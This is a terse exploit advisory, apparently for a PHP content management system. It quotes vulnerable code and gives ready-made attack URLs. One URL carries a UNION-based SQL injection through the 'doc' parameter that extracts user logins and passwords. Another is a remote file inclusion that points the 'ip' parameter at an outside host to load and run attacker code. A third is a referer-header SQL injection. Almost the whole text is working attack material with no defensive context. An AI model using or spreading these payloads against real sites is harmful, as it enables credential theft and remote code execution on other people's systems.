$sSQL="SELECT ".$suffx."_page.title from _page where _page.id='".$_GET['doc']."'";
http://mirrorcms.ru/?ip=news&doc=-1+union+select+1,2,3,concat(usr_login,char(64),usr_password),5,6,7,8,9+from+usertable/*
if(file_exists("$ip/docn.php")){ include("$ip/docn.php"); }
http://[target]/index.php?ip=http://www.hack.narod.ru
stat.php: ... $rname=getenv("HTTP_REFERER"); $doc_res=my_query("SELECT * from referer WHERE rname='$rname' AND datein='$datein'"); ...